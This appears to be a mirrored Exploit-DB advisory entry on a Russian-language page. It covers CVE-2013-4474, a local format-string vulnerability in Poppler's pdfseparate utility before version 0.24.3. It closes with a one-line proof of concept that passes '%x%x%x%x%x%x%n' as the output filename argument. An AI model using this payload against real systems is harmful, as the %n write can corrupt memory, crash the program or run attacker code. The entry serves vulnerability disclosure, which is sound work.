- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38817
- Проверка EDB
-
- Пройдено
- Автор
- DANIEL KAHN GILLMOR
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2013-4474
- Дата публикации
- 2013-10-26
Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String
Код:
source: https://www.securityfocus.com/bid/63374/info
Poppler is prone to a local format-string vulnerability because it fails to sanitize user-supplied input.
An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.
Versions prior to Poppler 0.24.3 are vulnerable.
./pdfseparate -f 1 -l 1 aPdfFile.pdf "%x%x%x%x%x%x%n"- Источник
- www.exploit-db.com
